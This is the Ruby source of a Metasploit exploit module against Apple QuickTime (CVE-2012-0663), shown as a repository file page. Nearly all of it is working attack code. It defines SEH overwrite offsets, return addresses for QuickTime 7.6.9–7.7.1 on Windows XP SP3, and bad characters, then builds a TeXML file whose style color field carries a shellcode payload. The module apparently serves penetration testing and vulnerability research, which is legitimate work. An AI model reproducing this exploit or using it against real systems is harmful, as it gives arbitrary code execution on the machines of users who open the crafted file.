metasploit-framework/modules/exploits/windows/fileformat/apple_quicktime_texml.rb

134 lines
4.2 KiB
Ruby

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Apple QuickTime TeXML Style Element Stack Buffer Overflow',
'Description' => %q{
This module exploits a vulnerability found in Apple QuickTime. When handling
a TeXML file, it is possible to trigger a stack-based buffer overflow, and then
gain arbitrary code execution under the context of the user. This is due to the
QuickTime3GPP.gtx component not handling certain Style subfields properly, storing
user-supplied data on the stack, which results the overflow.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Alexander Gavrun', # Vulnerability Discovery
'sinn3r', # Metasploit Module
'juan vazquez' # Metasploit Module
],
'References' =>
[
[ 'OSVDB', '81934' ],
[ 'CVE', '2012-0663' ],
[ 'BID', '53571' ],
[ 'ZDI', '12-107' ],
[ 'URL', 'http://0x1byte.blogspot.com/2012/06/cve-2012-0663-and-cve-2012-0664-samples.html' ],
[ 'URL', 'http://support.apple.com/kb/HT1222' ]
],
'Payload' =>
{
'DisableNops' => true,
'BadChars' => "\x00\x23\x25\x3c\x3e\x7d"
},
'Platform' => 'win',
'Targets' =>
[
[ 'QuickTime 7.7.1 on Windows XP SP3',
{
'Ret' => 0x66f1bdf8, # POP ESI/POP EDI/RET from QuickTime.qts (7.71.80.42)
'Offset' => 643,
'Max' => 13508
}
],
[ 'QuickTime 7.7.0 on Windows XP SP3',
{
'Ret' => 0x66F1BD66, # PPR from QuickTime.qts (7.70.80.34)
'Offset' => 643,
'Max' => 13508
}
],
[ 'QuickTime 7.6.9 on Windows XP SP3',
{
'Ret' => 0x66801042, # PPR from QuickTime.qts (7.69.80.9)
'Offset' => 643,
'Max' => 13508
}
],
],
'Privileged' => false,
'DisclosureDate' => 'May 15 2012'))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.xml']),
], self.class)
end
def exploit
my_payload = rand_text(target['Offset'])
my_payload << generate_seh_record(target.ret)
my_payload << payload.encoded
my_payload << rand_text(target['Max'] - my_payload.length)
texml = <<-eos
<?xml version="1.0"?>
<?quicktime type="application/x-quicktime-texml"?>
<text3GTrack trackWidth="176.0" trackHeight="60.0" layer="1"
language="eng" timeScale="600"
transform="matrix(1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 1, 0, 1.0)">
<sample duration="2400" keyframe="true">
<description format="tx3g" displayFlags="ScrollIn"
horizontalJustification="Left"
verticalJustification="Top"
backgroundColor="0%, 0%, 0%, 100%">
<defaultTextBox x="0" y="0" width="176" height="60"/>
<fontTable>
<font id="1" name="Times"/>
</fontTable>
<sharedStyles>
<style id="1">
{font-table: 1} {font-size: 10}
{font-style:normal}
{font-weight: normal}
{color: #{my_payload}%, 100%, 100%, 100%}
</style>
</sharedStyles>
</description>
<sampleData scrollDelay="200"
highlightColor="25%, 45%, 65%, 100%"
targetEncoding="utf8">
<textBox x="10" y="10" width="156" height="40"/>
<text styleID="1">What you need... Metasploit!</text>
<highlight startMarker="1" endMarker="2"/>
<blink startMarker="3" endMarker="4"/>
</sampleData>
</sample>
</text3GTrack>
eos
texml = texml.gsub(/^ {4}/,'')
print_status("Creating '#{datastore['FILENAME']}'.")
file_create(texml)
end
end